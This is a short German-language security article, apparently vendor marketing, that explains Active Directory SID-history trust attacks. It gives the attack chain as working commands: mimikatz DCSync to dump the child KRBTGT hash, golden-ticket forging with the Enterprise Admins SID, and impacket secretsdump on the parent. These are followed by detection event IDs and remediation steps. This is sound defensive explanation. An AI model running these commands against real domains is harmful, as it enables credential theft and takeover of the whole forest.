Was Sind Active Directory Trust-Angriffe?
Active Directory Trusts ermöglichen Benutzern einer Domäne, sich bei Ressourcen in einer anderen zu authentifizieren. Der wirkungsvollste Trust-Angriff ist die SID-History-Injektion — der KRBTGT-Hash einer untergeordneten Domäne wird verwendet, um Kerberos-Tickets mit SID-History-Attributen zu fälschen, die eine Mitgliedschaft in der Enterprise Admins-Gruppe der übergeordneten Domäne beanspruchen.
Die Angriffskette
Schritt 1 - Untergeordnete Domäne Kompromittieren
Der Angreifer erlangt zunächst Domain Admin in einer untergeordneten Domäne.
Schritt 2 - KRBTGT-Hash Extrahieren
lsadump::dcsync /domain:kind.corp.local /user:krbtgt
Schritt 3 - Trust-Informationen Aufzählen
Get-ADTrust -Filter * | Select-Object Name, TrustType, TrustDirection, SIDFilteringQuarantined
Get-ADGroup -Identity "Enterprise Admins" -Server corp.local | Select-Object SID
Schritt 4 - Inter-Realm-Ticket mit SID-History Fälschen
kerberos::golden /user:Administrator /domain:kind.corp.local /sid:S-1-5-21-KIND-SID `
/sids:S-1-5-21-ELTERN-SID-519 `
/krbtgt:KIND_KRBTGT_HASH `
/ptt
Schritt 5 - Pivot zur übergeordneten Domäne
impacket-secretsdump -k corp.local/[email protected] -no-pass
Erkennung
| Event ID | Quelle | Worauf zu achten |
|---|---|---|
| 4769 | DC | Inter-Realm-TGS-Anfrage |
| 4672 | Eltern-DC | Enterprise Admin-Privilegien für unerwartetes Konto |
SID-Filterung Prüfen
Get-ADTrust -Filter * | Select-Object Name, SIDFilteringQuarantined
# SIDFilteringQuarantined = True: SID-History wird ignoriert
⚠️ Warnung: SID-Filterung ist bei Parent-Child-Trusts innerhalb derselben Gesamtstruktur standardmäßig deaktiviert.
Behebung
SID-Filterung auf Externen Trusts Aktivieren
netdom trust corp.local /domain:externer-partner.com /quarantine:yes
Unnötige Trusts Entfernen
Get-ADTrust -Filter * | Select-Object Name, TrustType, Created | Sort-Object Created
So Erkennt EtcSec Dies
EtcSec prüft alle Trust-Beziehungen in Ihrer AD-Umgebung und identifiziert Fehlkonfigurationen, die domänenübergreifende Privilege Escalation ermöglichen könnten.
Trust-bezogene Prüfungen umfassen die Erkennung externer Trusts ohne SID-Filterung und bidirektionaler Trusts, die die Angriffsfläche erweitern.
ℹ️ Hinweis: EtcSec prüft alle Trust-Konfigurationen automatisch. Starten Sie ein kostenloses Audit.
